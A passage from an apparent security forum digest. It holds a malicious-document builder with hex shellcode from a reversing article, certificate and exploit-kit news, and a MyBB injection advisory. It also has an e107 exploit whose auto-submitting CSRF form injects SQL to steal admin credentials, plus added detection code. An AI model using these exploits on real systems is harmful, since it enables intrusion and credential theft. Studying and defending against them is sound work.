"\x66\x33\x31\x63\x30\x66\x63\x61\x63\x38\x34\x63\x30\x37\x34\x30" "\x37\x63\x31\x63\x66\x30\x64\x30\x31\x63\x37\x65\x62\x66\x34\x33" "\x62\x37\x63\x32\x34\x32\x38\x37\x35\x65\x31\x38\x62\x35\x61\x32" "\x34\x30\x31\x65\x62\x36\x36\x38\x62\x30\x63\x34\x62\x38\x62\x35" "\x61\x31\x63\x30\x31\x65\x62\x38\x62\x30\x34\x38\x62\x30\x31\x65" "\x38\x38\x39\x34\x34\x32\x34\x31\x63\x36\x31\x63\x33\x65\x38\x39" "\x32\x66\x66\x66\x66\x66\x66\x35\x64\x65\x62\x30\x35\x65\x38\x66" "\x33\x66\x66\x66\x66\x66\x66\x38\x39\x65\x66\x38\x33\x65\x66\x38" "\x39\x38\x39\x65\x65\x38\x33\x65\x65\x39\x35\x38\x31\x65\x64\x34" "\x35\x66\x66\x66\x66\x66\x66\x36\x38\x33\x33\x63\x61\x38\x61\x35" "\x62\x35\x33\x65\x38\x38\x61\x66\x66\x66\x66\x66\x66\x35\x35\x36" "\x61\x36\x34\x66\x66\x64\x30\x35\x37\x38\x39\x63\x37\x30\x31\x65" "\x66\x61\x34\x38\x30\x37\x66\x66\x66\x30\x30\x37\x35\x66\x39\x35" "\x66\x36\x38\x38\x65\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x36" "\x64\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36" "\x66\x36\x65\x35\x31\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35" 
"\x34\x66\x66\x64\x30\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35" "\x30\x65\x38\x35\x33\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35" "\x31\x35\x31\x35\x35\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38\x39" "\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x33\x66\x66\x66\x66" "\x66\x66\x66\x34\x31\x35\x31\x35\x35\x66\x66\x64\x30\x37\x33\x37" "\x36\x36\x33\x36\x38\x36\x66\x37\x33\x37\x34\x32\x65\x36\x35\x37" "\x38\x36\x35\x30\x30") footer =("\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" 
"\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" 
"\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" 
"\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x7D\x7D\x7D\x7D" )
url=""
ul = open("URL.txt",'rb')
sr = ul.read()
for i in range(0,len(sr)):
    a = ord(sr[i])
    url += "%02x" % a
url +="\x30"*2
payload = header + url + footer
file = open("Laden.doc",'wb')
file.write(header + url + footer)
file.close()
os.rename("Laden.doc",st)

URL.txt contains the actual URL from where one has to download calc. This URL.txt file should be in the same folder where the creator file will be. You can also embed the direct text string of the URL in the creator file.

One more point: reversing the exploit sample will vary from exploit to exploit. It’s not that while reversing another sample you will always apply the same process, but in 80% of the cases, it’s what I explain above.

Source: InfoSec Institute Resources – Reversing a Malicious Word Document
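A defender-side check for documents built the way the creator above builds them, as an added example that is not part of the original article. Decoding the creator's header bytes shows the payload stored as hex text in the `\sv` value of a shape property named `pfRaGMeNTs`, followed by the hex-encoded URL and a `00` terminator. The function names, the size threshold and the constructed sample document are assumptions made for illustration (Python 3).

```python
import binascii
import re

# A shape property named pFragments (any letter case, optional numeric
# parameter and whitespace after \sn), capturing the text of its \sv value.
PFRAG_RE = re.compile(
    rb"\{\s*\\sn\d*\s*pfragments\s*\}\s*\{\s*\\sv\s*([^{}]*)\}",
    re.IGNORECASE,
)
HEX_RE = re.compile(rb"[0-9a-fA-F]+")
URL_RE = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+")

# Assumption: illustrative cut-off, not a value from the article. Tune it
# against the benign documents seen in your own environment.
MAX_BENIGN_HEX_CHARS = 256


def scan_rtf(data):
    """Return one finding per pFragments property found in raw RTF bytes."""
    findings = []
    for match in PFRAG_RE.finditer(data):
        # The value is a ';'-separated list; the last field holds the hex data.
        blob = match.group(1).split(b";")[-1]
        hex_digits = b"".join(HEX_RE.findall(blob))
        if len(hex_digits) % 2:
            hex_digits = hex_digits[:-1]  # drop a dangling nibble
        decoded = binascii.unhexlify(hex_digits)
        findings.append({
            "offset": match.start(),
            "hex_chars": len(hex_digits),
            "oversized": len(hex_digits) > MAX_BENIGN_HEX_CHARS,
            # The URL ends at the 00 terminator, which the pattern excludes.
            "urls": [u.decode("ascii") for u in URL_RE.findall(decoded)],
        })
    return findings


def build_constructed_sample(url):
    """Constructed, inert test document: zero filler where a sample has code."""
    body = binascii.hexlify(
        b"\x00" * 160 + url.encode("ascii") + b"\x00" + b"a" * 40
    )
    return b"{\\rtf1{\\shp{\\sp{\\sn1\tpfRaGMeNTs}{\\sv 1;1;" + body + b"}}}}"


if __name__ == "__main__":
    sample = build_constructed_sample("http://example.invalid/sample.bin")
    for finding in scan_rtf(sample):
        print(finding)
```

The extracted URL is the download location the document would contact, so it can go straight into proxy and DNS log searches during triage.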
-
[h=2]Hacker Database[/h]
Browse the World's Largest Public Hacker Database
Link: http://www.soldierx.com/hdb
Haters gonna hate : TinKode, sysgh0st | SOLDIERX.COM
-
[h=1]TURKTRUST CA Problems[/h]
Kurt Baumgartner, Kaspersky Lab Expert
Posted January 03, 21:04 GMT

Microsoft just publicly announced a release to actively "untrust" three certificates issued by Certificate Authority TURKTRUST and its Intermediate CAs, a subsidiary of the Turkish Armed Forces ELELE Foundation Company. According to Microsoft, the company made a couple major mistakes resulting in fraudulent certificate issuance that could be used to MiTM encrypted communications or spoof gmail and a long list of other google properties.

A Chrome installation detected "an unauthorized digital certificate for the "*.google.com" domain" late the night of Dec. 24th 2012, and the Google security team's investigation began there. TURKTRUST's mistakes included issuing two certificates incorrectly. They created digital certificates for *.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org. Both of these certs lacked CRL or OCSP extensions and were incorrectly issued as end-entity certs. These mistakes enabled the *.EGO.GOV.TR authority to be misused and fraudulently issue a certificate for *.google.com.

Microsoft is not only issuing fixes for this CA trust problem, but including known CA fixes in the recent past. This list of Google properties are fixed by the release:

*.google.com *.android.com *.appengine.google.com *.cloud.google.com *.google-analytics.com *.google.ca *.google.cl *.google.co.in *.google.co.jp *.google.co.uk *.google.com.ar *.google.com.au *.google.com.br *.google.com.co *.google.com.mx *.google.com.tr *.google.com.vn *.google.de *.google.es *.google.fr *.google.hu *.google.it *.google.nl *.google.pl *.google.pt *.googleapis.cn *.googlecommerce.com *.gstatic.com *.urchin.com *.url.google.com *.youtube-nocookie.com *.youtube.com *.ytimg.com android.com g.co goo.gl google-analytics.com google.com googlecommerce.com urchin.com youtu.be youtube.com

The release may cause some confusion. The vendors are handling the incident differently - the three certificates that are being "untrusted" by Microsoft do not include the TURKTRUST Trusted Root CA certificate itself. But the certificates for the two intermediate authorities are affected, as is the fraudulent Google property certificate.

Also adding to the confusion is the fact that some systems seem to have TURKTRUST certificates included as a Trusted Root Certificate Authority on their Windows system, but others do not. This inclusion has to do with the ways in which Microsoft updates their root certificate stores on newer systems vs. older Windows OS systems. Microsoft provides a knowledge base article that presents all of the gory details on Microsoft Root Certificate updates. Just follow the link and go to the section "How Windows Updates Root Certificates", where you will find information on both Windows Vista and Windows 7, on Windows XP and its manual update root package, and on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 OS systems.

To sum it up, most users that do not visit web sites in the Middle East, especially Turkey and Cyprus, will not have the TURKTRUST Trusted Root CA certificate installed on their system (although Google did not disclose the location of the detected fraudulent certificate). So, for the most part, this release does not directly affect their system. Also, most helpful here is the automatic updater of revoked certificates released by Microsoft back in June, available for Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7, and Windows Server 2008 R2.

Both Mozilla and Google posted information about the problem. Google pushed Chrome’s certificate revocation metadata on December 24th and 25th to block both of the Intermediate Certificate Authority certificates. An ongoing discussion exists over at the mozilla.dev.security.policy group. It appears that Mozilla is the only vendor of the three to altogether suspend trust in the TURKTRUST root CA cert: "We have also suspended inclusion of the “TÜRKTRUST Bilgi İletişim ve Bilişim Güvenliği Hizmetleri A.Ş. © Aralık 2007” root certificate, pending further review".

Please see the long list of links at the right side of the page for more information from the vendors and posts on past CA issues.

Source: TURKTRUST CA Problems - Securelist
-
Analytical Summary Of The Blackhole Exploit Kit

Description: ANALYTICAL SUMMARY OF THE BLACKHOLE EXPLOIT KIT

Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit

There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly.

A. What a browser exploit kit is, and what it isn't
   It only does exploits
   Directing victims to the exploits is out of scope
   Usually done with spam or iframe injections
   The actual malware installed is out of scope too
   Where the exploit kit is hosted is also quite variable

B. Timeline
   Version 1.0.0 - September 2010
      i. It's not that different from other exploit kits
   Version 1.0.1
   Version 1.0.2 - November 2010
      i. Changelog
      ii. Leaked in May 2011
   Version 1.1.0 - December 2010
      i. Changelog
   Version 1.2.0 - August 2011
      i. Changelog
   Version 1.2.1 - December 2011
   Version 1.2.2
      i. Cryptome "Virus"
   Version 1.2.3 - March 2012
   Version 1.2.4 - June 2012
      i. CVE-2012-1723
      ii. CVE-2011-2110
   Version 1.2.5 - July 2012
      i. CVE-2012-1889
      ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm'
   August 2012
      i. CVE-2012-4681
   Version 2.0.0 - September 2012
      i. Changelog
      ii. The official announcement isn't entirely true.

C. The "Free Version"
   Pulled from a system with C99 Shell
   IonCube "copy protection"
   How to break IonCube obfuscation
   Analysis of PHP Source Code

D. Open Source Code in use
   PluginDetect
   MaxMind GeoIP
   etc.

E. The Exploits
   CVE-2010-0188
   etc. etc. etc. as time allows

X. There is almost no change in the exploits themselves from one version of the exploit kit to the next.

Y. Curious clues about the possible authorship of some exploits

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source:

Source: Analytical Summary Of The Blackhole Exploit Kit
-
Beef - Java Payload Exploitation
Description: In this video I will show you how to exploit a system using the BeEF Browser Exploitation Framework and the Java Payload module. In the BeEF framework there is a module called Java Payload under local exploits; we are going to use that module to exploit a Windows 7 system. So, first you need to hook the browser and use that module. The victim will get a Java pop-up, and if he clicks OK you will get the meterpreter shell after some time. Note: getting the session will take some time, so be patient.
Original Source: Source: Beef - Java Payload Exploitation
-
[h=1]Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video[/h]January 3rd, 2013, 15:33 GMT · By Eduard Kovacs Security researcher Luca De Fulgentis has identified a number of user interface redressing (clickjacking) vulnerabilities in popular services that could be leveraged by cybercriminals to gather user information in what’s known as identification attacks. He has also identified a clickjacking flaw in Google Chrome. The fact that many websites don’t use the X-Frame-Options header or other anti-clickjacking mechanisms allows an attacker to harvest all sorts of information if he can trick the victim into clicking on apparently innocent links or buttons. The expert has demonstrated that such an issue in support.google.com can be used to extract a user’s email address, full name and profile picture URL. The names, email addresses and other details of Microsoft Live and Yahoo! users could also be easily obtained by leveraging clickjacking vulnerabilities. However, the most interesting finding of De Fulgentis is a Chrome vulnerability that allows attackers to extract user information despite the many security mechanisms implemented by Google, such as denying the use of the view-source handler and disallowing cross-origin drag and drop. “Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the ‘dropper’ is a form (text area, input text field, etc.) located on the same domain,” the researcher explained. “Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. 
Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntarily publish sensitive data.” To demonstrate how such attacks work, the expert has published a couple of proof-of-concept videos showing how the vulnerability could be leveraged against Google and Amazon users. Earlier in December, De Fulgentis published the details of a similar vulnerability that affected Firefox. Here are the proof-of-concept videos published by the expert: Source: Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video - Softpedia
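The article above notes that many sites send no X-Frame-Options header or other anti-clickjacking mechanism. The following check is an added example, not part of the article or of the researcher's work: it classifies a response's framing policy from its headers and also covers the CSP frame-ancestors directive, which goes beyond the one header the article names. The function names and verdict labels are assumptions made for this example.

```python
"""Classify a response's anti-framing headers (added, constructed example)."""

XFO_RESTRICTIVE = {"DENY", "SAMEORIGIN"}


def frame_ancestors(csp_value):
    """Return the frame-ancestors source list of one CSP header, or None."""
    for directive in csp_value.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def allows_any_origin(sources):
    """True when a source list does not narrow the set of framing origins."""
    return any(s in ("*", "http:", "https:") for s in sources)


def assess_framing(headers):
    """headers: list of (name, value) pairs. Returns (verdict, reason)."""
    xfo, policies = set(), []
    for name, value in headers:
        lname = name.lower()
        if lname == "x-frame-options":
            xfo.update(v.strip().upper() for v in value.split(",") if v.strip())
        # Content-Security-Policy-Report-Only is deliberately not matched:
        # a report-only policy does not block framing.
        elif lname == "content-security-policy":
            sources = frame_ancestors(value)
            if sources is not None:
                policies.append(sources)

    if policies:
        # All delivered policies are enforced together, so one tight list wins.
        # An empty source list behaves like 'none'.
        if any(set(p) <= {"'none'", "'self'"} for p in policies):
            return ("protected", "frame-ancestors is 'none', 'self' or empty")
        if all(allows_any_origin(p) for p in policies):
            # Browsers that honour frame-ancestors ignore X-Frame-Options.
            return ("unprotected", "frame-ancestors admits any origin")
        return ("restricted", "frame-ancestors lists specific origins")

    if not xfo:
        return ("unprotected", "no anti-framing header")
    if any(v.startswith("ALLOW-FROM") for v in xfo):
        return ("unprotected", "ALLOW-FROM is ignored by current browsers")
    if len(xfo) == 1 and xfo <= XFO_RESTRICTIVE:
        return ("protected", "X-Frame-Options " + next(iter(xfo)))
    return ("review", "conflicting or unknown X-Frame-Options values")
```

A "restricted" verdict still needs a human look at the listed origins, since any of them can frame the page.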
-
I knew it was a macro, but I didn't know how it was defined, and after a bit of searching:
WinBase.h
#define ZeroMemory RtlZeroMemory
RtlZeroMemory is defined in WDH.h:
#define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length))
Apparently it is the same thing. There are probably small differences in the call, though: "memset" will probably call the wrapper from the Visual C runtime, while the ZeroMemory call may be executed directly in the kernel (RtlZeroMemory routine (Windows Drivers)). I'll do a bit of research to see.
-
[h=1]Defrag Tools: #21 - WinDbg - Memory User Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder 33 minutes, 48 seconds
In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a user mode debug session.
We cover these commands:
- !address -summary
- !address <addr>
- !vprot <addr>
- !mapped_file <addr>

Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution.

Resources:
- Microsoft Windows SDK for Windows 7 and .NET Framework 4
- Sysinternals VMMap
- Performance and Memory Consumption Under WOW64
- MEMORY_BASIC_INFORMATION structure
- Memory Protection Constants

Timeline:
[00:50] - Live Debug of Notepad
[01:10] - VMMap of Notepad
[02:08] - Virtual Address Space summary (!address -summary)
[04:30] - 'Large Address Space Aware' increases the VA space from 2GB to 4GB
[08:11] - Memory Mapped Files
[10:11] - Memory Type, State and Protection (inc. Guard Pages)
[21:22] - Allocation Base vs. Base Address (!address <addr>)
[26:52] - Virtual Protection shows the Alloc. Base Protection (!vprot <addr>)
[29:14] - Mapped Files (!mapped_file <addr>)

Source: Defrag Tools: #21 - WinDbg - Memory User Mode | Defrag Tools | Channel 9
-
NFC - NEAR FIELD COMMUNICATION
Subho Halder and Aditya Gupta

INTRODUCTION
Near Field Communication at a glance.

What is NFC?
NFC, or Near Field Communication, is a set of standards or protocols for communication between two devices by either touching them or bringing them into close proximity (less than 4 cm). The communication protocols of such devices are based on RFID standards, including ISO 14443. These standards are defined and extended by the NFC Forum, which was founded in 2004 by some major companies such as Sony, Nokia, Philips, Samsung etc. The operating frequency of such communication is merely 13.56 MHz ( +/- 7 ), which is very low. This gives the advantage of easy integration into portable devices without the need for much battery power.

Download: www.exploit-db.com/download_pdf/23826
-
[h=1]MyBB (editpost.php, posthash) SQL Injection Vulnerability[/h]
MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection.

Vulnerable code: /editpost.php
=== Line 398 ===
$posthash_query = "posthash='{$posthash}' OR ";
===

It can be done by using Tamper Data (or Live HTTP Headers): when submitting a post, edit the 'posthash' POST parameter to your payload, submit, then go to edit your post.
Small "HOWTO" in picture: http://imgur.com/a/JxfEI

This bug was not found by me, but afaik, I am the first one to release it.
--
*Joshua Rogers* - Retro Game Collector && IT Security Specialist
gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg>
Source: MyBB (editpost.php, posthash) SQL Injection Vulnerability
-
[h=1]e107 v1.0.2 CSRF Resulting in SQL Injection[/h]
# Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection
# Google Dork: intext:"This site is powered by e107"
# Date: 01/01/13
# Exploit Author: Joshua Reynolds
# Vendor Homepage: http://e107.org
# Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download
# Version: 1.0.2
# Tested on: BT5R1 - Ubuntu 10.04.2 LTS
# CVE: CVE-2012-6434
-----------------------------------------------------------------------------------------
Description:
Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form. The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability but when done in conjunction with a SQL injection attack it can result in complete information disclosure.
The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class.
The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that would provide the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download.
------------------------------------------------------------------------------------------
Exploit:
<html>
<body onload="document.formCSRF.submit();">
<form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create">
<input type="hidden" name="cat_id" value="1"/>
<input type="hidden" name="download_category" value="2"/>
<input type="hidden" name="download_name" value="adminpassdownload"/>
<input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/>
<input type="hidden" name="download_url_external" value=""/>
<input type="hidden" name="download_filesize_external" value=""/>
<input type="hidden" name="download_filesize_unit" value="KB"/>
<input type="hidden" name="download_author" value=""/>
<input type="hidden" name="download_author_email" value=""/>
<input type="hidden" name="download_author_website" value=""/>
<input type="hidden" name="download_description" value=""/>
<input type="hidden" name="download_image" value=""/>
<input type="hidden" name="download_thumb" value=""/>
<input type="hidden" name="download_datestamp" value=""/>
<input type="hidden" name="download_active" value="1"/>
<input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/>
<input type="hidden" name="download_comment" value="1"/>
<input type="hidden" name="download_visible" value="0"/>
<input type="hidden" name="download_class" value="0"/>
<input type="hidden" name="submit_download" value="Submit+Download"/>
</form>
</body>
</html>
------------------------------------------------------------------------------------------
Fix: This bug has been fixed in the following revision: r13058
------------------------------------------------------------------------------------------
Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family.
Contact:
Mail: infosec4breakfast@gmail.com
Blog: infosec4breakfast.com
Twitter: @jershmagersh
Youtube: youtube.com/user/infosec4breakfast
Source: e107 v1.0.2 CSRF Resulting in SQL Injection
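Both this advisory and the MyBB posthash advisory above come down to request values concatenated into SQL, and here the state-changing admin POST is also accepted without a token. The following is an added example, not code from e107, MyBB or either advisory author: a handler that refuses the request unless a session-bound token is present and then binds every value as a parameter, plus a posthash lookup that validates the format before binding. The field name `e-token` follows the advisory's wording; the table and column names, `SERVER_KEY`, the function names, the assumption that posthash is a 32-character hex digest, and sqlite3 standing in for the real database are all assumptions made for this example.

```python
import hashlib
import hmac
import re
import secrets
import sqlite3

# Assumption: a server-side secret from which per-session tokens are derived.
SERVER_KEY = secrets.token_bytes(32)
# Assumption: posthash is a 32-character lowercase hex digest.
POSTHASH_RE = re.compile(r"[0-9a-f]{32}")


def issue_token(session_id):
    """Token embedded as a hidden field in the admin form; bound to the session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_ok(session_id, submitted):
    """Constant-time comparison; a missing token never matches."""
    expected = issue_token(session_id).encode()
    return hmac.compare_digest(expected, (submitted or "").encode())


def open_db():
    """Hypothetical, simplified schema for the two handlers below."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE download (name TEXT, url TEXT, author TEXT)")
    db.execute("CREATE TABLE attachment (posthash TEXT, filename TEXT)")
    return db


def create_download(db, session_id, form):
    """Admin action: reject a request without a valid token, then bind values."""
    if not token_ok(session_id, form.get("e-token")):
        return False  # cross-site form posts cannot know the token
    db.execute(
        "INSERT INTO download (name, url, author) VALUES (?, ?, ?)",
        (
            form.get("download_name", ""),
            form.get("download_url", ""),
            form.get("download_author", ""),
        ),
    )
    return True


def attachments_for(db, posthash):
    """Lookup keyed on posthash: validate the format, then bind the value."""
    if not POSTHASH_RE.fullmatch(posthash):
        raise ValueError("posthash is not a 32-character hex digest")
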